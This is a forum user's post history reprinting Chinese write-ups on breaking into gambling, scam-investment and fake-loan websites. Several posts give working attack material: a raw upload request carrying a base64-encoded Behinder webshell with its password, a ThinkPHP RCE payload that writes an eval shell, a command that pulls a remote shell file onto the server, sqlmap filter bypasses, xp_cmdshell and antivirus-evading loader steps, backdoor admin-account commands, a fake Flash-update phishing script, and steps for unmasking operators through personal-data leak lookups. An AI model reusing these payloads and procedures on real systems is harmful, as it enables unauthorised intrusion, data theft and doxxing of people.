
UKhackteam

Everything posted by UKhackteam

  1. Foreword: This article is for communication and learning only. Any direct or indirect consequences or losses caused by spreading or using the information it provides are the responsibility of the user; the author bears no responsibility for them.

     Penetration testing can be divided into three stages: information collection (collect as much related asset information as possible and determine the scope of the test); vulnerability discovery (further vulnerability detection and exploitation against the collected assets); and further exploitation of the vulnerabilities found, and how far they can be pushed.

     Entry points for gambling (BC) sites: 1. API endpoints in JS. 2. Multi-port sites. 3. The customer-service system, phishing the operators, etc. 4. Points-system targets and fragile side sites on the same server. 5. The recharge interface. 6. Finding the source: look for a demo site or leaked source code and do a white-box analysis. 7. The BC backend, found through JS resource URLs, subdomains and similar methods; for ordinary small sites it is mostly the primary domain plus ad, ag, admin, 123admin, ht, etc.

     Reprinted from: https://mp.weixin.qq.com/s/ZGNKIkfOidLPpjT856LHxw
  2. 0x01 Vulnerability description: Online gambling refers to gambling conducted over the Internet (illegal gambling websites, gambling apps, WeChat groups, etc.). Because online gambling is illegal and the funds are not protected by law, "rigged game" scams are common, and many victims dare not go to the police after being cheated, with the result that families are ruined. Cracking down on online gambling is therefore urgent. A certain gambling system has an arbitrary file upload vulnerability: an attacker can upload a trojan file through it and take over the server.

     0x02 Vulnerability reproduction. FOFA: body='main.e5ee9b2df05fc2d310734b11cc8c911e.css'

     1. Execute the POC, upload the Behinder (Ice Scorpion) webshell, and the upload path is returned:

        POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Dnt: 1
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: 1
        If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMT
        If-None-Match: '63154eb6-273'
        Te: trailers
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 746

        zKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==

     2. Connect with Behinder to get the webshell. Behinder's default connection password: rebeyond

     3. A nuclei batch verification script has been published on Knowledge Planet (there are many assets): nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -stats

     Reprinted from: https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==mid=2247486261idx=1sn=2ea324e5b3b895bd500a509bd15ae90fchksm=c184dfe2f6f356f47a5f80d045fac890227a508488b23898482ce4f9daa91fecc54d2f83629scene=178cur_album_id=2581677939042598912#rd
  3. I've been browsing QQ Space, which is how I came to the following. Open the site: it is very considerate, you can get into both the front end and the backend. Now for the vulnerabilities.

     SQL injection: this is a set of programs built by secondary development on a template, which happens to be one I have on hand and have already audited, so it was easy. No filtering; I'll just note it.

     Arbitrary file upload: I suspect this is a backdoor left by the developer; those who understand will see it at a glance. Just create a form locally and submit it. There is a problem with the target site, though: the path is not echoed on upload, so the echo must have been commented out. In a locally built test I modified the uploaded file name to this format. Idea: reproduce the upload locally and submit to the remote site at the same moment; at the same point in time the returned file name should be the same. Tested, and the reproduction succeeded. Click through and that's it.

     I'd like to ask those of you who are proficient in PHP auditing: is this code usable? I tried various truncations but could never get PHP code to execute.

     Reprinted from: https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ
  4. 0X00 Stumbling in: I accidentally ran into a junk gambling site, a pig-butchering scam platform. Visiting the scanned directories and files one by one did not help much, but the backend address was found. phpMyAdmin returned 500. Visiting xd.php leads to the backend, which also requires an authorization code; I tried 8888, 123456 and the like, and every attempt returned an error and shut me out on the spot. Subdomain brute-forcing found only one, and nmap scans found nothing. Back on the homepage, I noticed the URL was a bit unusual.

     0X01 Looking for similar sites and source code: operations like this rarely develop their own code. The source was certainly downloaded from the Internet and someone was found to set it up. The unusual URL is the signature, so I searched for it.

     0X02 Starting the audit: with that many sites the source must be a mess, so I spent some time finding it and trying to audit it. I downloaded the source and scanned it with Seay. It was too big and I was too lazy to build it locally, so I used the source directly against the target. I found a fileupload.php that looked a bit problematic, and checking the target showed the file exists there too. I extracted the file and tested it in a local environment. Direct access automatically creates two folders, upload and upload_tmp. This is a demo point; actually it looks more like a backdoor, and the filename variable is fully controllable. Reading on, there are a few checks: the form field name can be file. For the upload, ignore everything else and just change the upload form, adding the parameters name and file. The name parameter controls the uploaded file name (aaa.php); select 1.jpg and upload. No path is returned, but aaa.php now exists under upload.

     SQL injection: the value of where comes from the request, and checkinput above does not check its type. Following betListCnt, it is passed straight into the query without any processing, and there are many similar points.

     0X03 Verifying the audited vulnerabilities: got a webshell through the upload above and tried privilege escalation. It turned out to be Debian. Port 6379 is open, but the service is not started by root. Looking at the kernel version, it seemed promising, so I looked for a privilege-escalation exploit. I generated an msf payload and brought the machine into msf for convenience, then looked for a matching escalation exploit.

     0X04 Privilege escalation: found CVE-2019-13272 and CVE-2017-16995. While looking for tools on GitHub I remembered msf ships with escalation modules, so I searched and used what came up. The first failed on the spot. Trying the second, CVE-2017-16995, returned a session with root privileges. Privilege escalation complete.

     Reprinted from: https://mp.weixin.qq.com/s/Yh0qq5imlfHhNQnbtPfxcA
  5. 1. Case 1

     Because I was recently cheated by a scammer, I am planning to let those scammers find out what despair means. Last night I crawled nearly 1,000 platforms selling PUBG cheats; you cheat sellers will get hit one by one when I have time. I found that most of them use one ASPX program, but unfortunately without the source there is no white-box audit, and the black box turned up nothing. I could only pick the soft targets, and hammered four of them in one go last night. Basically all of them run BaoTa; however the php-venom 4 series and its encoder turned out to be more stable than BaoTa. I dumped the database and found 4000+ records inside. Tonight another cheat site was hit, but embarrassingly there is no write permission. So here is a long filler record.

     1. Into the backend, no tricks: this should be a promotional site, there is nothing in it but promotional content. Whatever it is, just do it. I took a look: it is a DedeCMS secondary-development site. Getting into the backend was easy, and everyone understands what that means.

     2. Metaphysical backend: I found the backend had many functions deleted, especially the DedeCMS file manager. But from experience, many of these secondary developments do not really delete the editor, they just hide it from the backend page. Inspect element: find any link and replace it with media_main.php?dopost=filemanager, click it, and there is the file manager page. Uploaded a shell and thought it would end there. It turned out that although the upload succeeded, nothing was there. I thought it was a WAF, so I switched to a harmless jpg, which also did not get through. I think it is a directory permission issue. Found the session temp directory and uploaded there, still no good. No screenshot, I simply could not get it up. Maybe the whole site has no write permission. Tried the delete function and found I could delete files, emmmmm, so is there permission or not? Generally, without write permission there is no modify permission, that is, no delete permission. Thinking the upload function was broken, I changed approach to getshell.

     3. When getshell fails, the first thing that comes to mind is modifying a file and putting a shell in it. It shows "csrf token is wrong". Searching for how to solve it, I found you change the check function directly and add return as its first statement. As a result, the same error popped up when modifying config.php, so I was stuck in a loop. Changing the tag gives the same error. Then I tried each DedeCMS 0day for arbitrary backend code execution: it prompts that execution succeeded, but then either a 404 page or the csrf token error. Why does the CSRF token check always fail? I have never run into this before. Is it something I am doing wrong? If any of you know why, please tell me, thanks.

     4. Getshell succeeded: I thought about it, then went out for a meal. Then I wondered whether there would be someone else's backdoor, since it was a weak password. I remembered DedeCMS has its own backdoor detection and removal function. Same inspect-element trick: find the backdoor check function and start the scan. Sure enough, suspicious files were found, and they were all other people's backdoors. Pick any one and connect.

     5. Finally, I found it was a Xingwai virtual host and the whole site has no write permission, no wonder nothing could be uploaded. Browsing the directories: cannot cross to other sites, no write permission, cannot bypass disable_functions. It is as if there is nothing. But magically you can delete any file. I won't delete the site; keep the evidence.

     2. Case 2

     First, open the website and see its cool interface, heartwarming announcement and shameless promotional copy.

     1. Discovering the injection: built on TP3, backend at /admin. Tried a universal password: "password error". Tried admin/admin888: "account does not exist". The two responses differ, so there may be injection.

     2. Use Burp to capture the packet and send it to Repeater for further testing. When the condition is true it returns status: -2; when false, status: -1. That confirms the guess: the backend login is injectable. Threw it at sqlmap: no injection detected, just a pile of 404 Not Found. At first I thought a CDN was blocking sqlmap's traffic, but later found there was no protection at all, a fake CDN. So the CMS probably filters something.

     3. Bypassing the filter: testing showed 404 is returned whenever angle brackets appear. BETWEEN can be used to bypass this; the true=-2 / false=-1 behaviour continues, so the blind-injection condition is met. It suddenly struck me that this is the same as the injection challenge in the 5Space CTF final: true returns one page, false another, filtered characters a third, and BETWEEN bypasses it. CTF was sincere and did not deceive me. So just add --tamper=between to the sqlmap parameters.

     4. Last: the administrator password in the database uses AES without the key and cannot be decrypted. Ordinary user login is closed; they can neither register nor log in. Nothing else useful apart from the information on the "orphans" who ran off. Pack up the evidence and submit it to the relevant departments.

     Reprinted from: https://mp.weixin.qq.com/s/Bms1EPvpb1S7sU2KQX8ctA
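Added illustration for Case 2 above (not the post's own code, and not sqlmap's between.py): why rejecting every request that contains '<' or '>' does not stop a boolean-based blind injection, and where the BETWEEN rewrite itself breaks down. The filter function and the probe strings are constructed for the example; the equivalence check runs the two comparison forms in SQLite.

```python
"""
Angle-bracket filtering versus the BETWEEN rewrite.

Added illustration (not code from the post and not sqlmap's own between.py).
All inputs below are constructed for the example.
"""
import re
import sqlite3

# Simple operand: number, quoted string, or identifier/call such as ascii(substr(x,1,1))
_TOKEN = r"[\w.()'\"]+"


def naive_angle_bracket_filter(payload: str) -> bool:
    """Stand-in for the CMS behaviour the post describes: block anything containing < or >."""
    return "<" in payload or ">" in payload


def to_between(payload: str) -> str:
    """Rewrite 'A > B' as 'A NOT BETWEEN 0 AND B' and 'A = B' as 'A BETWEEN B AND B'.

    Only simple operands are handled; '>=' and '<' are deliberately left untouched.
    """
    payload = re.sub(rf"({_TOKEN})\s*>\s*({_TOKEN})", r"\1 NOT BETWEEN 0 AND \2", payload)
    payload = re.sub(rf"({_TOKEN})\s*=\s*({_TOKEN})", r"\1 BETWEEN \2 AND \2", payload)
    return payload


def blind_probe(position: int, guess: int) -> tuple[str, str]:
    """One boolean-blind probe (true/false flip the response, as in the post): raw and rewritten."""
    raw = f"1 AND ascii(substr((SELECT database()),{position},1)) > {guess}"
    return raw, to_between(raw)


def equivalent_for(a: int, b: int) -> bool:
    """Evaluate 'a > b' and its BETWEEN form in SQLite; True when both agree."""
    con = sqlite3.connect(":memory:")
    original = con.execute(f"SELECT {a} > {b}").fetchone()[0]
    rewritten = con.execute(f"SELECT {to_between(f'{a} > {b}')}").fetchone()[0]
    con.close()
    return bool(original) == bool(rewritten)


def mismatching_left_operands(b: int, lo: int = -5, hi: int = 127) -> list[int]:
    """Left operands in [lo, hi] for which the rewrite changes the truth value.

    NOT BETWEEN 0 AND b treats negatives as 'greater than b', so the trick is only
    sound for non-negative values such as the ASCII codes a blind probe compares.
    """
    return [a for a in range(lo, hi + 1) if not equivalent_for(a, b)]


if __name__ == "__main__":
    raw, rewritten = blind_probe(1, 64)
    print("blocked raw:", naive_angle_bracket_filter(raw), "blocked rewritten:", naive_angle_bracket_filter(rewritten))
    print(rewritten)
    print("mismatches for b=64:", mismatching_left_operands(64))
```

The point for a defender is in the last function: the comparison the attacker needs survives the filter unchanged for every value that matters (0..127), so blocking characters is not a substitute for parameterised queries on the login path.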
  6. We found a backend built on the QP (board-and-card game) backend framework, which has vulnerabilities. This framework has many holes, such as user enumeration: if we enter an existing user with a wrong password it says "user or password incorrect", while for a non-existent user it says "user not exists". There is also SQL injection on the site. We only need to capture the POST packet that submits the account and password, paste it into a txt file and feed it to sqlmap. It is MSSQL, so we can enable xp_cmdshell. The plan here is to write a webshell, so first use os-shell to determine the path (super slow), then write the webshell with xp_cmdshell. It came up successfully.

     Then I planned to bring it online in CS for the next steps and tried web delivery, but antivirus stopped it. Very annoying; no way around it except AV evasion. The method I use is a split loader: generate the payload, then write a shellcode loader, base64-encode the shellcode and compile. I put the shellcode on my VPS and uploaded the loader to the target. One, two, three, online! Right, it is a low-privileged user; many privilege-escalation attempts failed, but in the end SweetPotato won it and I got my favourite SYSTEM. Add a user: net user admin$ admin@123 /add; add it to the administrators group: net localgroup administrators test /add; then connect directly over 3389. I originally planned to scan remote desktop on the intranet with fscan, but found the intranet IP was different from usual; after scanning, many hosts appeared, so I judged this was a VPS and stopped the intrusion there.

     Reprinted from: https://mp.weixin.qq.com/s/ch3zcIlUPpZ8tjCJttwarQ
  7. Recently I accidentally discovered a virtual-currency pig-butchering platform, so I ran a round of tests. The front end looked like this. I got in with the ThinkPHP 5.0.5 RCE and successfully wrote a webshell:

        s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

     Checking phpinfo showed that every function able to run system commands is disabled, and neither COM nor dl() loading can be used to execute commands. As shown: assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open // all of PHP's command-execution functions disabled. However, file read and write functions such as assert() and file_put_contents() are not disabled. On checking, it turned out to be Windows. Since all of PHP's command-execution functions are disabled, it is very uncomfortable not being able to run system commands.

     After downloading his site's source code and reading it briefly, I found that his administrator cookie is fixed and can be forged as follows; it looks like a backdoor. So you can bypass the backend login: the admin cookie is fixed, just add the cookie field. F12 in the browser, add the above key/value to the cookie, visit index, and you are logged into the backend as shown below. He had made a lot of money (many people were cheated). I asked customer service at the front end and learned the transfer account (the pig-butchering method: after the user transfers money to the account provided by customer service, the user tops up the corresponding amount in his own account, which the backend then reviews; after review he can use that balance to invest and trade currency), and kept it as evidence to submit.

     Since system commands could not be executed, to break through I started browsing the files on his server. Flipping through the system files, I found the BaoTa folder. Probing showed the BaoTa service is indeed running, but the default login port had been changed, as shown below. In the BaoTa files, the file admin_path.pl stores the path; that gave the BaoTa login portal, which I accessed successfully. Continuing, a default.pl file stores the corresponding login password. With the password, I tried the default username, which was wrong and could not log in. Continuing through the files, default.db records the login history, and there I found the login account. With that account and password I logged into the BaoTa management backend. Found the scheduled tasks, modified one to execute the CS beacon, and after it came online changed the task back. CS online, as shown. Checking the IP: only a public address, no intranet, and several other devices in the same C segment are all the same set of things, so I did not go further. It is all the same thing; nothing interesting.

     Reprinted from: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486570idx=1sn=0c20fbbf4adbeb5b555164438b3197f7chksm=ce67a6f3f9102fe51b76482cd7d6bb644631ae469d8c1802956034077137ecd49ea56c8d2b1fscene=21#wechat_redirect https://xz.aliyun.com/t/8224
  8. 0x00 Overview: One day an online friend told me he had been cheated. The way he was cheated was unusual: having no money, he chose to take out a loan and was scammed during the loan process. (Scam text messages.)

     0x01 Fraud process (the victim is called Xiaohui here): One day Xiaohui received a text message about online loans. It happened to be the end of the month and money was tight, and Xiaohui could not resist the temptation to download and open the app. After registering an account and filling in his ID number, a hand-held ID photo, workplace, family information and so on, he applied for a loan of 20,000 yuan, but it did not arrive for a long time. Xiaohui asked customer service and learned: "Dear, you need to pay a VIP fee of 688 first to apply for a loan. After payment, the VIP fee will be transferred to your bank card together with the loan amount." Xiaohui thought he would not lose money, so for next month's rent he paid for VIP. Having paid for VIP, he thought he would get the loan and make it through the end of the month, but still received neither the loan nor the VIP fee. This time customer service contacted Xiaohui on their own: "Your credit limit is insufficient, you need to deposit another 3,500 yuan in cash to prove your repayment ability. After payment, the fee will be transferred to your bank card together with the loan amount." Xiaohui was anxious; seeing next month's rent gone, he gritted his teeth, borrowed 3,500 yuan from a friend and paid it into the bank card number customer service provided. He thought, no excuses this time! 20,000 yuan, hand it over! Xiaohui had already planned how to eat, drink and have fun with the 20,000 yuan. But fortune still did not favour him. Customer service contacted him again and said the approval had gone through and the loan was about to be paid, but a further 3,000 yuan was needed, which would again be transferred together with the loan. Xiaohui was stunned. Then customer service sent Xiaohui a fake contract generated from the backend. Xiaohui panicked: he had only wanted a loan, but had lost several thousand yuan and would end up on a credit report, and the loan itself still had not arrived! Seeing things getting worse and worse, Xiaohui found me. After hearing his description I checked the loan app on his phone and told him helplessly: you have been scammed, and the money will not come back. Xiaohui was stunned again and shed tears of regret.

     ps: the above is only the real course of the fraud; the narrative details are my own embellishment. The author also briefly analysed and recorded two common sets of fraud source code on the market.

     0x02 Vulnerability analysis

     1. First set of source code

     (1) ThinkPHP log leak: built on ThinkPHP 3.2.3 with separated front and back ends. Debug is enabled by default, which leaks SQL information into the log and the exception cache. Construct the payload: App/Runtime/Logs/21_10_16.log. Get the leaked admin-table account and password and enter the backend.

     (2) Controllable array leading to RCE: the list of uploadable file names is passed directly in the request. I guessed that the backend keeps the file names in an array (which was confirmed after getting the webshell). Add php to the uploadable file names, then upload to get a webshell. Checking the corresponding configuration file, the uploadable suffixes are indeed in an array. You can also getshell by closing the array. Payload: siteName=11111').phpinfo();// Look at how the backend handles it: because it returns an array, the string concatenation operator '.' must be added. Log in to the backend to check whether the payload executed.

     2. Second set of source code

     (1) Customer-service WebSocket XSS: the author's capabilities are limited. The second set of loan-fraud source code appears to be a one-click build; all instances use the latest BaoTa plus the free BaoTa WAF, which was not enough to gain permissions, so I looked for a breakthrough in the customer-service side. Front end: find the customer-service entrance, upload an image, and you are handed over to the upload packet sent over the WebSocket. Modify the WebSocket packets and construct an XSS. Cookie obtained.

     3. Customer-service system control / PC control. 3.1 Controlling the database: log in to the MySQL database to view the fraud suspect's login IP. A dynamic IP of a telecom base station in Hangzhou, judged to be a home router, with no tracing value yet.

     0x03 Controlling the customer-service system: the first set of fraud source code uses an online customer-service system. In the backend I dug out the customer-service backend login address. The front end showed an account or password error, but the account could not be brute-forced. Then the author registered a customer-service account himself, walked through SetCookies via adminid and uid, and successfully escalated to obtain the customer-service account. The account is Chinese; got the password by brute force. Logged into the customer-service backend: the entire fraud script chain, and the chat history with victims.

     0x04 Flash phishing: after taking control of the fraud app's server, the author used Flash phishing to try to take control of the fraud gang's personal PCs. The page that is redirected to after a successful backend login was modified to redirect to a pre-prepared fake Flash update page. Prepare in advance: a fake Flash domain (preferably containing the word "flash") and an AV-evading trojan.

        <script>
        window.alert = function(name) {
            var iframe = document.createElement('IFRAME');
            iframe.style.display = 'none';
            iframe.setAttribute('src', 'data:text/plain,');
            document.documentElement.appendChild(iframe);
            window.frames[0].window.alert(name);
            iframe.parentNode.removeChild(iframe);
        };
        alert('Your FLASH version is too low, please upgrade it and then access the page again!');
        window.location.href = 'https://www.flashxxxx.com';
        </script>

     Effect: enter the account and password and log in; the JavaScript above loads; clicking "OK" jumps to the prepared fake Flash update page to induce a download. But in the end nothing came online. The logs show the fraud gang did log into the backend, which is a small regret.

     0x05 Summary: A typical feature of online loan fraud is that the suspect recruits victims who need loans with the gimmick of "no collateral, no review", collects a deposit under the name of "account frozen, unfreezing fee" to complete the loan, and then charges again under the names of insurance premium, activation fee, service fee and so on. To recover the money already paid, the victim can only keep transferring according to the whole process the suspect designed, and so the money is cheated away. Some self-employed people who urgently need money, office workers with advanced consumption habits, college students and other groups are particularly vulnerable. The scammers even reach into Hong Kong, Taiwan and abroad. According to analysis, this fraud gang also ran the same scheme in Brazil, using the first set of source code analysed above, with more than 500 victims in Brazil. The net of heaven is vast and lets nothing slip! All who do evil will be severely punished by the law!

     Reprinted from: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247502166idx=1sn=3fe78999b5b43a059e66975dd185b3ccchksm=ce6463cff913ead9c3a448d7466b7c38ed593a709918265283387ad4bb787292bdd2979e7d64scene=21#wechat_redirecthttps://xz.aliyun.com/t/10391
  9. 0x00 Introduction: With illegal gambling sites running rampant, countless families have been torn apart. To that end I am contributing a small effort, hoping to be of some help to the "relevant departments". What I am performing for you today is harvesting BC: Tianheng Shengda.

     0x01 Program introduction: the program uses PHP 5.4 + MySQL; the structure is as follows. Basically, apart from outsourcing, the criminals running such illegal sites have modified a handful of program templates. For now, due to my technical level, only Tianheng can be published. The version may be a bit old, but a large part of it is still in use. According to a test in mid-April by a netizen who did not want to be named, about 70% of the sites had these problems, while illegal sites using this program were collecting about 5,000 to 20,000 yuan in half an hour.

     0x02 Vulnerability details

     1. money - SQL injection: web\wjaction\default\PayOnlineBack.class.php. Follow money: it is obtained via GET; then look at the conditions. The first is the Key check, which is in the configuration file. If the Key is wrong, no order can take effect; in other words the Key is definitely in the URL request, and this check can be bypassed. The next condition generates an MD5 value for verification, but the check is flawed: the key value is not included in it. So when we submit directly, set $tno.$payno.$money to empty, and we get the MD5 of $md5key, because $sign is visible in the URL. After cracking it, we can write scripts and inject according to its verification mechanism. Keep reading; it's arbitrary from here. The last check: the username here must be real, so this check is considered ineffective. Then, following the analysis above, you can inject. The most important point is guessing the value of md5Key.

     2. Order information - stored XSS: the order information username, where the default payment form is submitted, is not filtered on either the front end or the backend, giving a stored XSS.

     3. No verification in the backend - getshell: lib/classes/googleChart/markers/GoogleChartMapMarker.php, an arbitrary code execution: the Google variable takes data from GET and executes it. I won't write up the code for such a low-level problem. (This one is not reliable, roughly a 30% chance.)

     0x03 Summary: this source code has more than just these few holes; you can practise digging them yourself. Second, I originally thought of releasing tools for collecting illegal sites that were not covered here, but on reflection decided against it, to avoid leading "other" security personnel astray. This is still a filler article; I hope you will all give me more advice!

     Reprinted from: https://mp.weixin.qq.com/s/7R3OrGPmUesDz4YKuxoJjw
  10. 1. Directory structure: first, a look at the structure. The relevant code is in the system folder. I'll show you the holes directly.

     2. Auditing the holes

     1. Shopping cart fetches information asynchronously - SQL injection: system\modules\member\cart.action.php. Although single quotes are filtered, the value here is not wrapped in single quotes, so it is injectable, and the user's identity is not verified: the injection can be performed from outside without logging in. Straight at the official site, hahaha!

     2. BOM plugin - directory: system/plugin/bom/bom.plugin.php. Just access it directly. Even if the backend path is changed, it still works. Just right!

     3. My orders - stored XSS (can steal the administrator's cookie): since this CMS came out a while ago, many script kiddies have found XSS in it before, but my XSS seems to be a 0day, hahaha. I need to post in the order function; here is the process. Add a picture, change the image address in the fileurl_tmp parameter to our XSS statement. At this point the IMG tag is closed and 1 pops up (triggered in the backend's "Show order view").

     4. Upload configuration - backend getshell: some may see there are uploads in the backend, but in fact those uploads cannot be used. Although you can change the whitelist format in the backend, you still cannot upload. So go in from here! Since single quotes are filtered, use none. Write the payload into the allowed upload types; it is done once submitted. Then write a remote shell via the copy function.

     5. Flawed backend captcha: the default account is admin. This string of MD5 values is the corresponding captcha value, and the interface can be called here for brute force. Another small flaw.

     6. Combination punch: getshell via CSRF+XSS. We use the XSS to embed an HTML page and then simulate all the operations. Done. Starting from modifying the upload format and inserting the shell, simulate access to [/index.php/admin/setting/upload?c=copy('http://www.xxx.com/shell.txt','./inc.php'); Just chain a series of them and it is done. If you really are not at ease, add an administrator at the end. This CMS does no CSRF filtering, and I did not take screenshots. My brothers' techniques are surely better than mine. Wow, hahaha.

     Reprinted from: https://mp.weixin.qq.com/s/8OTU9yQ3pxj6k2QpbEzNRA
  11. When looking for TSRC assets in Eagle Picture, while I was preparing to dig at Tencent SRC, I saw the domain name of this site: qq.com.xxxx.top, with the title "login". My first feeling was that it was not a serious site; it should be a phishing site found through whois and webpack packaging. This kind of site basically has some test accounts. I tried 18888888888888888 with password 123456. I saw this. This is the kind of site where people earn commissions by doing tasks; the main feature is to cheat people out of money.

F12, search the requests and js; the loaded resource file reports an error. It uses thinkphp but there is no hole; the IP is really available, and the backend is disguised, called xxx check-in system. Find other assets through fofa: accessing the IP gives a template page for enterprise website building; add admin behind the IP and it jumps to the backend of the enterprise website builder. To tell the truth, this is really bad.

Entering the home /x again, thinkphp 5.0.5, verified that there is RCE. The site that does tasks and earns commissions had not yet been carefully tested; I collected information, found the side station and got in. Basically, the database configuration is in data or config. md5-decrypt the administrator password, enter the backend to see other information, and don't pay much attention to it; mainly looking for the site administrators.

1. The sensitive mobile phone number is often passed through the recommendation number, which is a mobile phone number: 139xxxx
2. Administrator log analysis: the suspicious IP is located in Sichuan
3. Look up WeChat and Alipay through the mobile phone number to find this person
4. Look up this person through the social work library: QQ, Weibo and his own photos

Reprinted from the original link: https://mp.weixin.qq.com/s/9M0HEP1x-5Xt1JQeyVDrGA
  12. 0x01 thinkadmin historical vulnerability review
The backend address of the other party's app has been found to be thinkadmin, so we need to review the historical vulnerabilities of thinkadmin.

CVE-2020-25540 https://github.com/zoujingli/ThinkAdmin/issues/244
Use the POC as follows: https://github.com/Schira4396/CVE-2020-25540
Directory listing: POST /?s=admin/api.Update/node with body rules=['runtime/']
File read: /?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b
The essence is probably a function designed to allow third parties to compare the system's web files on the server. As a result, any directory can be read due to directory traversal. Although there are certain restrictions, the harm is still very, very great, so this function was removed after subsequent updates.

There is also a deserialization vulnerability without a CVE: https://github.com/zoujingli/ThinkAdmin/issues/238
There are two interfaces; one is the rules parameter of the directory listing function above: POST /?s=admin/api.Update/node with body rules=payload
The other place is POST /?s=wechat/api.Push/index with body receive=payload

0x02 First source code
Because the official site no longer provides downloads of the old version of the source code, I went elsewhere to find an old version of the source code using thinkphp5.1.38. After checking, it has the following vulnerabilities.

application/wechat/controller/api/Push.php
Only one of the two deserializations was fixed.

application/admin/controller/api/Update.php
The routes for listing directories and reading any file have changed slightly, and the directory listing can no longer be controlled by passing the rules parameter, so it can only list the web root directory. But arbitrary file reading has had its various restrictions removed, which means you can directly read config/database.php to get the database configuration.
After obtaining the database configuration, if the database can be connected to externally, it can be exploited more deeply.

application/admin/controller/api/Plugs.php
This is the file upload interface that thinkadmin comes with. Like many CMS designs, its whitelist storage_local_exts can be configured in the database or in the system backend. Normally we could use this to getshell, but obviously if we directly add php to the whitelist, we cannot pass the fourth if, and there is also an intercept in the backend system configuration.

application/admin/controller/Config.php
If we operate the database directly, we can bypass the backend configuration restrictions, but cannot bypass the upload() restrictions. Obviously, filtering php alone is not enough. If the other party is a Windows server, we still have php::$DATA as an option. If the other party is Apache and has made the wrong configuration, we also have possible parsing suffixes such as php3/php4/php5/php7/pht/phtml/phar.

0x03 Second source code
However, the first source code is of no use except for getting familiar with the thinkadmin architecture, because the target is thinkphp6.0.3, and the vulnerabilities are different from the first one: there is no deserialization. However, there are still directory listing and file reading, and they are exactly the same as the historical vulnerabilities.

app/admin/controller/api/Update.php
But when listing directories, I encountered a problem. This is because I was listing the web root directory. If the other party's project is huge, or a folder lacks permission, it will cause an error. At this time, you need to list directories in a targeted manner, mainly ./app and ./runtime. Read ./app to get the controller paths. In the original thinkadmin there are not many breakthroughs, but many of these programs are secondary developments.
Compared with the controllers that the original thinkadmin does not have, you can audit them for vulnerabilities directly. Auditing vulnerabilities requires arbitrary file reading; please review the previous section for details. In short, with CVE-2020-25540 we are effectively in possession of its source code. In this program it is easy to find a SQL injection.

/app/admin/controller/api/Main.php
However, after I had dumped the password, I found that login required OTP verification, so I could not continue the audit.

/app/admin/controller/Posting.php
Very stupid command splicing; there are three places in the same location, but all require backend permissions. In the end, it was found that exec() was in disable_functions, so it cannot be used.

/app/admin/controller/api/Upload.php
The last place was discovered thanks to a friend's reminder. At first glance, isn't this the upload that comes with thinkadmin? I had analyzed before that a specific environment is needed to exploit it, so I skipped it directly. As it turns out, there is an extra xkey parameter that can completely control $this->name. It is hard not to suspect that this is a backdoor. In the end, getshell is like this.

But this upload interface also requires backend permissions; what should I do? At this point it is the turn of ./runtime, often used with thinkphp, to appear. Reading the file runtime/admin/log/single_error.log, it is easy to find that it records a series of session errors. And we can see that this program uses the original php session, and it is not placed in /tmp or /var/lib/php/sessions/, but in runtime/session. That's simple. We directly use the directory listing to list all sessions and then brute-force them. In this way, you can directly enter the backend and bypass the OTP limit. Then use its xkey backdoor to getshell.

0x04 Alternative thinking
What if there is no backdoor? This system is linux+nginx, and the original upload limit of thinkadmin cannot be bypassed. But in the subsequent code audit, I found that it has an image-hosting server.
This getshell server (A) can access an interface of the image-hosting server (B) with the file_paths parameter. The purpose is to let server B download the pictures on server A in turn and back them up. Why do I know this? Because server B is even more riddled with holes; you will find out by directly accessing this interface. Not only does the source code leak because of debug, but the splicing of this command is too naked, and it can even be used as a shell. Therefore, we can completely take down server B directly through arbitrary file reading and code audit without taking down server A.

What's the use of getting server B? Server A will use curl to request server B. In this case, you can tamper with the code of server B, change the interface to a 302 redirect, and then change the protocol to gopher, and you can hit the local ports of server A. If FPM port 9000 and Redis port 6379 are present locally on server A, SSRF getshell can be performed in this way. This case can often be exploited in the SSRF vulnerability of Discuz. Although there is no fpm 9000 this time, there is redis. The redis key and port are also stored in config/cache.php, and the web directory happens to have 777 permissions, which fully meets the conditions for gopher to hit local redis. Of course, I didn't try it in the end, but in theory there was no problem.

Reprinted from the original link: https://mp.weixin.qq.com/s/BuHJuQh3lyaq1SmY2xKl3g
